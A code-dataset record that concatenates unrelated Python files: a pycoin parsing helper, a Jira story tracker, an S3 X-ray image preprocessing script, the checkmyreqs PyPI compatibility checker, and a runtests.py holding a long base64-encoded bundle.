data = triple[1]
spec = triple[2]
version = data[0]
decoded = bech32m.convertbits(data[1:], 5, 8, False)
decoded_data = b''.join(int2byte(d) for d in decoded)
rv = (hr_prefix, version, decoded_data, spec)
return rv
def parse_bech32(s):
s = parseable_str(s)
return s.cache("bech32", parse_bech32_or_32m)
def parse_colon_prefix(s):
s = parseable_str(s)
return s.cache("colon_prefix", lambda _: _.split(":", 1))
``` |
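The cache in `parseable_str` means each parser runs at most once per string, even when several `parse_*` helpers probe the same input. A minimal usage sketch (the base58 literal is illustrative):
```python
from pycoin.networks.parseable_str import parseable_str, parse_b58

s = parseable_str("1BgGZ9tcN4rm9KBzDn7KprQz87SZ26SAMH")  # hypothetical input
first = parse_b58(s)   # runs a2b_base58 and stores the bytes under the "b58" key
second = parse_b58(s)  # served from s._cache; a2b_base58 is not called again
assert first is second
```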
{
"source": "josephbmanley/jira-tracker",
"score": 3
} |
#### File: jira-tracker/jira_tracker/project_tracker.py
```python
from jira_tracker.logger import logger
from jira_tracker.tracker_issue import TrackerIssue
import datetime
class ProjectTracker:
def __init__(self, jira_client, project_key):
self.jira = jira_client
self.key = project_key
def this_weeks_issues(self):
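        # datetime.today().weekday() counts days since Monday, so the
        # "-{n}d" bound anchors resolved issues to the current work week.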
result = self.jira.search_issues(
f"project = {self.key} AND assignee = currentuser() AND ((resolutiondate >= -{datetime.datetime.today().weekday()}d AND status = Done) OR status != Done)"
)
logger.debug(f"Found {len(result)} valid records this week in {self.key}")
issues = []
for issue in result:
issues.append(TrackerIssue(issue))
return issues
```
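A minimal sketch of wiring `ProjectTracker` to a client; the server URL and credentials are placeholders, and this assumes the standard `jira` package whose `search_issues` the class calls:
```python
from jira import JIRA
from jira_tracker.project_tracker import ProjectTracker

client = JIRA(server="https://example.atlassian.net",        # placeholder server
              basic_auth=("user@example.com", "api-token"))  # placeholder credentials
tracker = ProjectTracker(client, "PROJ")                     # hypothetical project key
for issue in tracker.this_weeks_issues():
    print(issue)
```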
#### File: josephbmanley/jira-tracker/setup.py
```python
import re
from os import path
from setuptools import setup
from codecs import open
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def read(*parts):
return open(path.join(here, *parts), 'r').read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^version = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='jira-tracker',
version=find_version('jira_tracker','__init__.py'),
description='Simple Jira story point tracking tool',
long_description=long_description,
long_description_content_type="text/markdown",
# The project's main homepage.
url='https://github.com/josephbmanley/jira-tracker',
# Author details
author='<NAME>',
author_email='<EMAIL>',
# Choose your license
license='MIT',
# See https://pypi.org/classifiers/
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='Jira',
packages=['jira_tracker'],
install_requires=['argparse','jira','pyyaml','wheel'],
package_data={},
entry_points={
'console_scripts' : [
'jira-tracker=jira_tracker:main'
]
}
)
``` |
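`find_version` only matches a module-level assignment at the start of a line (hence `re.M`). An illustration of the kind of line it expects to find in `jira_tracker/__init__.py` (contents hypothetical):
```python
import re

version_file = 'version = "0.3.1"\n'  # stand-in for the real __init__.py contents
match = re.search(r"^version = ['\"]([^'\"]*)['\"]", version_file, re.M)
print(match.group(1))  # 0.3.1
```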
{
"source": "joseph-bongo-220/DeepLearningProject",
"score": 3
} |
#### File: joseph-bongo-220/DeepLearningProject/preprocess.py
```python
import os
import numpy as np
from imageio import imread, imwrite
from skimage import img_as_ubyte
from skimage.transform import resize
from tqdm import tqdm
import boto3
import re
def crop_border(img):
"""crop black borders of images, relevant for Montgomery images"""
mask = img > 0
# Keeps rows and columns of images if they are not completely black
return img[np.ix_(mask.any(1), mask.any(0))]
def find_edge(img):
    """finds the shorter edge, used for square cropping"""
y, x = img.shape
return y if y < x else x
def crop_image(img, size):
    """Crops the image to a centered square of the given size"""
y, x = img.shape
startx = (x - size) // 2
starty = (y - size) // 2
return img[starty:starty + size, startx: startx + size]
def preprocess(imgdir, outdir, size=512):
"""full preprocessing, takes input and output directory"""
files = sorted(os.listdir(imgdir))
num_imgs = len(files)
for i, file in enumerate(tqdm(files)):
input_path = os.path.join(imgdir, file)
output_path = os.path.join(outdir, file)
img = imread(input_path, as_gray=True)
img_clean_border = crop_border(img)
edge = find_edge(img_clean_border)
cropped_image = crop_image(img_clean_border, edge)
final_img = resize(cropped_image, (size,size), order=3)
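        # imageio's grayscale reads come back as floats in [0, 255] and resize
        # keeps that float range, so scale to [0, 1] before img_as_ubyte.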
final_img = img_as_ubyte(final_img/255.0)
imwrite(output_path, final_img)
def get_s3_keys(client, bucket, file_type = "png"):
"""Get a list of keys in an S3 bucket."""
keys = []
resp = client.list_objects_v2(Bucket=bucket)
for obj in resp['Contents']:
if re.search("[.]" + file_type + "$", obj['Key']):
keys.append(obj['Key'])
return keys
def preprocess_s3(bucket, outdir, size=512):
"""same as preprocessing, but using data stored on an S3 bucket"""
s3 = boto3.client("s3")
files = get_s3_keys(s3, bucket)
num_imgs = len(files)
for i, file in enumerate(tqdm(files)):
# get file name
name = re.findall("(?<=/)[^/]*", file)[-1]
output_path = outdir+"/"+name
s3.download_file("yale-amth552-deep-learning", file, name)
img = imread(name, as_gray=True)
img_clean_border = crop_border(img)
edge = find_edge(img_clean_border)
cropped_image = crop_image(img_clean_border, edge)
final_img = resize(cropped_image, (size,size), order=3)
final_img = img_as_ubyte(final_img/255.0)
imwrite(name, final_img)
s3.upload_file(name, bucket, output_path)
os.remove(name)
if __name__ == '__main__':
preprocess_s3("yale-amth552-deep-learning", 'Cropped')
``` |
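The `np.ix_` trick in `crop_border` drops every row and column that is entirely black. A toy example of that step in isolation:
```python
import numpy as np

img = np.zeros((5, 5), dtype=np.uint8)
img[1:4, 2:4] = 200                        # content surrounded by black borders
mask = img > 0
cropped = img[np.ix_(mask.any(1), mask.any(0))]
print(cropped.shape)                       # (3, 2): black-only rows/columns removed
```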
{
"source": "josephbosire/checkmyreqs",
"score": 3
} |
#### File: josephbosire/checkmyreqs/checkmyreqs.py
```python
from __future__ import print_function
import argparse
import os
import re
import sys
import errno
import csv
from blessings import Terminal
TERMINAL = Terminal()
try:
# Different location in Python 3
from xmlrpc.client import ServerProxy
except ImportError:
from xmlrpclib import ServerProxy
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
CLIENT = ServerProxy('http://pypi.python.org/pypi')
IGNORED_PREFIXES = ['#', 'git+', 'hg+', 'svn+', 'bzr+', '\n', '\r\n']
IS_COMPATIBLE = 'yes'
NOT_COMPATIBLE = 'no'
UNKNOWN = 'No Info Available'
NOT_IN_PYPI = 'Not in pypi'
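# Order matters: two-character separators must come before their one-character
# prefixes, so "pkg>=1.0" splits on ">=" rather than ">".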
SEPARATORS = ["==", ">=", "<=", ">", "<"]
def parse_requirements_file(req_file):
"""
Parse a requirements file, returning packages with versions in a dictionary
:param req_file: requirements file to parse
:return dict of package names and versions
"""
packages = {}
for line in req_file:
line = line.strip()
for prefix in IGNORED_PREFIXES:
if not line or line.startswith(prefix):
line = None
break
if line:
line = line.strip()
            # let's strip any trailing comments
if "#" in line:
line = line[:line.index("#")].strip()
if ";" in line:
line = line[:line.index(";")].strip()
use_separator = None
            for separator in SEPARATORS:
if separator in line:
use_separator = separator
break
if use_separator:
package_name, version = line.split(use_separator)
                # let's strip extras from the package name
if "[" in package_name:
package_name = package_name[:package_name.index("[")].strip()
packages[package_name] = version
else:
print(TERMINAL.yellow('{} not pinned to a version, skipping'.format(line)))
return packages
def check_packages(packages, python_version):
"""
Checks a list of packages for compatibility with the given Python version
Prints warning line if the package is not supported for the given Python version
If upgrading the package will allow compatibility, the version to upgrade is printed
If the package is not listed on pypi.python.org, error line is printed
:param packages: dict of packages names and versions
:param python_version: python version to be checked for support
"""
pkg_compatibility_status_list = []
for package_name, package_version in packages.items():
print(TERMINAL.bold(package_name))
package_info = CLIENT.release_data(package_name, package_version)
package_releases = CLIENT.package_releases(package_name)
if package_releases:
            latest_release = package_releases[0]
else:
latest_release = ''
pkg_status = [package_name, package_version, latest_release]
if package_releases:
supported_pythons = get_supported_pythons(package_info)
pkg_status.append(','.join(supported_pythons))
# Some entries list support of Programming Language :: Python :: 3
# So we also want to check the major revision number of the version
# against the list of supported versions
major_python_version = python_version.split('.')[0]
if python_version in supported_pythons:
print(TERMINAL.green('compatible'))
pkg_status.append(IS_COMPATIBLE)
elif major_python_version in supported_pythons:
print(TERMINAL.green('compatible'))
pkg_status.append(IS_COMPATIBLE)
else:
latest_version = package_releases[0]
latest_package_info = CLIENT.release_data(package_name, latest_version)
latest_supported_pythons = get_supported_pythons(latest_package_info)
upgrade_available = ''
if supported_pythons:
if python_version in latest_supported_pythons:
upgrade_available = ' - update to v{} for support'.format(latest_version)
print(TERMINAL.red('not compatible{}'.format(upgrade_available)))
pkg_status.append(NOT_COMPATIBLE)
else:
                    # We get here if there was no compatibility information for
                    # the package version we requested
if python_version in latest_supported_pythons:
upgrade_available = ' - update to v{} for explicit support'.format(latest_version)
                    print(TERMINAL.yellow('not specified{}'.format(upgrade_available)))
                    pkg_status.append(UNKNOWN)
else:
print(TERMINAL.red('not listed on pypi.python.org'))
pkg_status.append(NOT_IN_PYPI)
pkg_compatibility_status_list.append(pkg_status)
print('-----')
return pkg_compatibility_status_list
def get_supported_pythons(package_info):
"""
Returns a list of supported python versions for a specific package version
:param package_info: package info dictionary, retrieved from pypi.python.org
:return: Versions of Python supported, may be empty
"""
versions = []
classifiers = package_info.get('classifiers', [])
for c in classifiers:
if c.startswith('Programming Language :: Python ::'):
version = c.split(' ')[-1].strip()
versions.append(version)
return versions
def main():
"""
Parses user input for requirements files and python version to check compatibility for
:return:
"""
parser = argparse.ArgumentParser('Checks a requirements file for Python version compatibility')
parser.add_argument(
'-f', '--files', required=False,
help='requirements file(s) to check',
type=argparse.FileType(), nargs="+"
)
parser.add_argument(
'-p', '--python', required=False,
help='Version of Python to check against. E.g. 2.5',
default='.'.join(map(str, [sys.version_info.major, sys.version_info.minor]))
)
parser.add_argument(
'-o', '--output', required=False,
help='Name of file to output with compatibility status. If not provided output will only be shown in the '
             'terminal. Usually a csv filename e.g. packages.csv',
default=False
)
args = parser.parse_args()
# If a file wasn't passed in, check if pip freeze has been piped, then try to read requirements.txt
if args.files is None:
if not sys.stdin.isatty():
args_files = [sys.stdin]
else:
try:
args_files = [open('requirements.txt')]
except IOError:
print('Default file requirements.txt not found')
sys.exit(errno.ENOENT)
else:
args_files = args.files
# Make sure Python version is in X.Y format
    if re.match(r'^[2-3]\.[0-9]$', args.python) is None:
print('Python argument invalid: Must be in X.Y format, where X is 2 or 3 and Y is 0-9')
sys.exit(errno.EINVAL)
print('Checking for compatibility with Python {}'.format(args.python))
compatibility_list = []
for filepath in args_files:
print('{0}\r\n*****'.format(filepath.name))
packages = parse_requirements_file(filepath)
compatibility_list += check_packages(packages, args.python)
print('\n')
if args.output:
print("Yes")
print(compatibility_list)
with open(args.output, "w") as file_handle:
writer = csv.writer(file_handle)
writer.writerow(['package_name', 'package_version', 'latest_package_releases', 'python_versions_supported', 'is_compatible'])
for row in compatibility_list:
writer.writerow(row)
if __name__ == '__main__':
main()
```
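`get_supported_pythons` reads version numbers straight off trove classifiers; a quick illustrative run against a `release_data`-shaped dict:
```python
info = {
    "classifiers": [
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
    ]
}
print(get_supported_pythons(info))  # ['2.7', '3', '3.6']
```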
#### File: josephbosire/checkmyreqs/runtests.py
```python
sources = """
... base64-encoded archive of the bundled test sources elided; the original embeds a compressed, machine-generated payload that is not human-readable ...
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
